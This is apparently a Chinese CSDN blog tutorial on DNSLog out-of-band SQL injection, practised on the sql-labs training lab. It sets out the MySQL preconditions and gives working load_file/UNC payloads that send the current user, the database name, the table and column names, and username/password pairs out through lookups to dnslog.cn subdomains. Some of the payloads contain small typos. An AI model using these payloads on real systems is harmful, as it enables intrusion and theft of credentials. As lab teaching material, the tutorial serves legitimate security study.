SQL注入之DNSLog外带注入

本文介绍了DNSLog的概念,以及如何利用它进行数据库注入攻击。涉及环境设置(如MySQL的secure_file_priv配置),实际操作步骤(如使用Ceye.ioDNSLog.cn获取域名并进行布尔盲注攻击),以及数据提取的方法。
摘要由CSDN通过智能技术生成

一、认识:

什么是dnslog呢?

DNS就是域名解析服务,把一个域名转换成对应的IP地址,转换完成之后,DNS服务器就会有一个日志记录本次转换的时间、域名、域名对应的ip、请求方的一些信息,这个日志就叫DNSLog。

但是想要查看DNSLog信息的人,必须是拥有DNS服务器权限的人,这就使的我们要是用dnslog注入方法的话,就需要搭建自己的一个dns服务器,成本相对较高。

所以在此就推荐两个平台,可以快速让我们使用dnslog外带注入

  1. ceye.io
  2. dnslog.cn

也可以使用BurpSuite同样可以实现相应功能。

二、利用场景

使用dnslog方法的场景非常苛刻

需要知道以下数据

  1. secure_file_priv=""  ,secure_file_priv必须是空

    1. secure_file_priv为null,load_file则不能加载文件。

    2. secure_file_priv为路径,可以读取路径中的文件;

    3. secure_file_priv为空,可以读取磁盘的目录;

  2. 服务器只能在windows下使用,因为需要使用到UNC路径

  3. 拥有root权限,因为有root权限后才能使用load_file()这个函数

    1. LOAD_FILE()函数可以加载本地文件系统中的文件,并将其作为字符串返回

三、环境的搭建

还是使用我们的sql-labs进行实验

首先查看mysql中secure_file_priv是否为空,如若不为空,则进入my.ini文件进行修改

进到my.ini文件中将secure_file_priv的值从null改为""
如果没有的话可以直接写入secure_file_priv=""之后重新启动mysql

1、查看secure_file_priv是否为空 

show variables like '%secu%';

2、进入my.ini修改

在my.ini中添加secure_file_priv=""

重启mysql

四、实现

此处我使用dnslog.cn获取一盒域名

1、先进行测试

以sql-labs的第8关的布尔盲注为例:

解释:我们先进测试,请求一下当前登录的用户;

1、load_file()函数用于从文件系统中读取文件内容并将其作为字符串返回,

注:四个\是因为斜杠有特殊含义,我们需要转义两个,user()是我们要请求的数据,最后一个是我们刚才获取的域名

2、然后使用concat()函数将数据拼接起来

3、相当于请求了一个UNC的地址就是这样一个数据\\user().ui9a1m.dnslog.cn这个主机下的/abc这个共享文件夹虽然不存在但是无所谓我们的目的是需要将user()数据获取,它会将数据解析到我们使用的dnslog.cn中它可以记录解析后的数据
4、这里为什么要用hex()呢因为user()中有一个@符它不支持所以我们将它转为16进制

?id=1' and load_file(concat('\\\\',hex(user()),'.ui9a1m.dnslog.cn/abc'))--+

发送请求,查看我们得到的信息

对16进制进行还原,可以看到得到了我们想要的数据

进行爆库

此处就不需要转16进制,直接请求表名

?id=1' and load_file(concat('\\\\',database(),'.ui9a1m.dnslog.cn/abc'))--+

得到库名:security

接下来我们进行爆表名

爆表名

注:因为使用group_concat()函数拼接时默认使用' , '进行拼接,dnslog无法解析,所以这里有两种方法可以解决

1、要么转为16进制,

2、要么使用separator "_"  使用下划线连接

?id=1'  and load_file(concat('\\\\',(select group_concat(table_name separator '_') from information_schema.tables where table_schema=database()),'.503l34.dnslog.cn/abc'))--+

很明显,我们要得到数据大概率在users表里,可以继续进行查询测试

爆字段

id=1' 20and load_file(concat('\\\\',(select group_concat(column_name separator '_') from information_schema.columns where table_schema=database() and table_name='users'),'.5qir98.dnslog.cn/abc'))--+

很明显,我们查对了,得到了想要的列名:username、password

那么知道了库名,表名,列名,接下来就可以查数据了

爆数据

id=1' and load_file(concat('\\\\' (select concat(username,'_',password) from security.users limit 0,1),'.nr4rzc.dnslog.cn/abc'))--+

注:在此处dnslog不能解析连接符'~',这里的我解决办法有两个;

1、对concat()函数进行16进制转换

id=1' and load_file(concat('\\\\' (select hex(concat(username,'_',password)) from security.users limit 0,1),'.nr4rzc.dnslog.cn/abc'))--+

2、或者将连接符换成'_'

在这里我两个都用了下是可以,上面仅展示一个

  • 25
    点赞
  • 42
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值